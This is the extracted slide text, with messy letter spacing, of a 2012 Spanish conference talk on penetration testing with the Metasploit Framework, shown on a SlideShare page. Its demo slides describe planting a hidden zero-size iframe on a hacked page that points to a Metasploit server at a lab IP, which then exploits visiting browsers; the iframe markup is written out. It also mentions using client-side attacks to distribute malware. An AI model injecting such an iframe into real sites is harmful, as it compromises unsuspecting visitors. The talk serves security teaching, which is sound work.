Pentesting con metasploit framework

827 views

Published on

Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
827
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
30
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Pentesting con metasploit framework

  1. 1. Pe n t e s t i n g c o n Me t a s p l o i t F r a me w o r k Pablo González
  2. 2. ¿Qué e sMe t a s p l o i t ?Es e l c a o s , p u r o y b e l l o p o rf u e r a , e t e r n o y c o mp l e j o p o rd e n t r o , e s p u r o p e n t e s t i n g …
  3. 3. Ag e n d a1. A r q u i t e c t u r a d e Me t a s p l o i t2. Fases de un test de intrusión3. ¿Dónde p a r t i c i p a Me t a s p l o i t ?4. El arte de la intrusión5. El bien y el mal…6. D e m o7. L a t i e n d a e n c a s a
  4. 4. Ar q u i te c t u r a ?
  5. 5. Fases Test Intrusión
  6. 6. Fa s e sAlcance y términos del test de intrusiónRecolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-Explotación d e l s i s t e m aGeneración d e i n f o r m e s
  7. 7. ¿Dóndep a r t i c i p a ?
  8. 8. Lo importante es…P a r t i c i p a r !!!Recolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-ExplotaciónPero incluso… a y u d a a
  9. 9. El arte de la intrusión
  10. 10. ¿Arte o Ingeniería? Pr o c e d u r e p e n t e s t i n g ; B E GI N wr i t e l n („p a s o 1‟) wr i t e l n („p a s o 2‟) … a r t e ; END; Pr o c e d u r e a r t e ; …
  11. 11. ÁmbitoExplotación vulnerabilidades (pero…)B e s t a n d Wo r s tPr a c t i c e s
  12. 12. Elección d e l p a y l o a dMás d e 200 p a y l o a d s …Son nuestras cartas… ¿Siempreu s a r e mo s a l r e y ?
  13. 13. Tipos de Intrusión¿Cómo l a n z o l o se x p l o i t s ? Sin Interacción… (t e r r o r !) Con Interacción… (c l i e n t -s i d e a t t a c k !)
  14. 14. Cl i e n t Si d e At t a c k !D a r k S h a d o w s , ¿Cómo hago paraque hagan peticiones a mí?M a i l i n g ? (s p a m ? ? ) Foros… Páginas w e b h a c k e a d a s …P u b l i c a c i o n e s e n I n t e r n e tA c o r t a d o r e s …A t a q u e s l o c a l e s (D N S Sp o o f )
  15. 15. El bien y el mal…
  16. 16. El límiteDebemos ser éticos… ¿Lo s o m o s ?La delgada línea…P o d e mo s u t i l i z a r l o sa t a q u e s c l i e n t -s i d ep a r a : (m u c h a s , m u c h a sc o s a s ) Distribución malware… P a y l o a d s p e r ma n e n t e s
  17. 17. D e mo : Aj u g a r !
  18. 18. ¿Qué v a m o s a h a c e r ?Escenario: (idea del mundo real… ^ ^ )1. Página h a c k e a d a …2. I f r a m e q u e a p u n t e a 1 s e r v e r c o n MS F3. L a n z a m i e n t o d e e x p l o i t s c o n t r a c l i e n t e4. Obtenemos el control…
  19. 19. I f r a me …<i f r a m es r c =h t t p ://192.168.56.101:8080/ w i d t h =0 h e i g h t =0s t y l e =“h i d d e n ”f r a m e b o r d e r =0m a r g i n h e i g h t =0m a r g i n w i d t h =0/>
  20. 20. L a t i e n d a e n c a s a
  21. 21. He tenido el honor……y han tenido la paciencia…Me t a s p l o i t p a r aPe n t e s t e r s

×